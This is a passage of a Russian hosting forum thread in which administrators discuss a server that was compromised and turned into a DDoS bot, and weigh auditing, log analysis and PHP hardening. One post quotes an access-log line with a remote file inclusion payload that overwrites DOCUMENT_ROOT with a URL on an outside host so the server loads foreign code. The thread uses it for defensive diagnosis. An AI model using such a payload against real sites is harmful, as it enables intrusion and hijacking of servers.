хакнули сервер, запустили на нем ddos бота

123
Hack_phoenix
На сайте с 04.04.2009
Offline
57
#11

Да почему же... Просто надо аудит проводить, а не просто логи читать... Там одних логов мало. Надо заразу еще и вычистить, да и найти дыру... Вот дыру по логам может и найдете.

...никто не узнает, как плачет ночью тот, кто идет днем по жизни смеясь... Хостинг. VPS. Мы работаем для вас. (http://hostace.ru).
dspu
На сайте с 10.05.2006
Offline
268
#12

появилось мнение, что вскрывают через

209.172.33.230 - - [28/Jun/2009:05:32:22 +0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/banner.txt??? HTTP/1.1" 200 71790 "-" "Mozilla/5.0"

вскрывают в течение суток сразу после удаления заразы из /tmp

на мой взгляд, через сапу

http://forum.sape.ru/showthread.php?t=32218

сделал себе htaccess как здесь http://blog.sjinks.org.ua/security/361-minimizing-consequences-of-http-scans/

и убрал $_SERVER['DOCUMENT_ROOT'] из кода сапы

но по идее на стороне сервера надо как-то сделать, чтобы из адресной строки такие переменные не переназначались

S
На сайте с 07.11.2008
Offline
152
#13
С Вашего сервера идет DDoS атака ёмкостью 1000 Mbps!
Ваш сервер отключен от сети.

Что-то здесь не чисто... один сервер и 1Gbit ддос.O_o Была ли ддос атака?! Они логи предоставили, на какие IP или сайты от Вас шли запросы?

dspu
На сайте с 10.05.2006
Offline
268
#14
seolancer:
Они логи предоставили, на какие IP или сайты от Вас шли запросы?

а какой мне в этом смысл? там список может быть из тысяч IP

SH
На сайте с 17.11.2003
Offline
183
#15
dspu:

но по идее на стороне сервера надо как-то сделать, чтобы из адресной строки такие переменные не переназначались

Может register_global отключить стоит?

Грамотные интересные авторские тексты, копирайтинг, рерайтинг. (/ru/forum/829527) С 1.11.2008г. сайт SavaHost.com и я - разные люди. Хостинг не продаю, ссылки не покупаю, тихо жду пенсии... :)
dspu
На сайте с 10.05.2006
Offline
268
#16
SavaHost:
Может register_global отключить стоит?

он был выключен

s314
На сайте с 01.06.2008
Offline
87
#17
seolancer:
Что-то здесь не чисто... один сервер и 1Gbit ддос.O_o Была ли ддос атака?! Они логи предоставили, на какие IP или сайты от Вас шли запросы?

Первая "D" в DDOS вообще означает Distributed, на одном сервере с парой ip это врядли возможно. А вот принимать участие в DDOS под управлением бота этот сервер вполне мог. Правда в исходящий поток в таких объемах очень слабо верится.

Что-то хостер не договаривает.

Andreyka
На сайте с 19.02.2005
Offline
822
#18

Я бы просто на месте ТС закрыл весь исход и не парился

Не стоит плодить сущности без необходимости
S
На сайте с 07.11.2008
Offline
152
#19
dspu:
а какой мне в этом смысл? там список может быть из тысяч IP

Нет, Вы не поняли. Для того, чтобы закрыть сервер за DDoS, требуется Abuse от получателя bad-пакетов.

Зная адрес получателя таких пакетов, Вы сможете найти, либо логи ботнета, либо процессы, которые соединяются с этим IP.

Himiko
На сайте с 28.08.2008
Offline
560
#20
seolancer:
Нет, Вы не поняли. Для того, чтобы закрыть сервер за DDoS, требуется Abuse от получателя bad-пакетов.

Зная адрес получателя таких пакетов, Вы сможете найти, либо логи ботнета, либо процессы, которые соединяются с этим IP.

Сервер могли закрыть за трафик... Думаю, что там shared-канал. Вряд ли у ТС честные 1Gb/s...

а какой мне в этом смысл? там список может быть из тысяч IP

Атакует ботнет (вместе с вашим сервером) обычно один конкретный сайт.

Профессиональное администрирование серверов (https://systemintegra.ru). Круглосуточно. Отзывы (/ru/forum/834230) Лицензии (http://clck.ru/Qhf5) ISPManager,VDSManager,Billmanager e.t.c. по низким ценам.
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий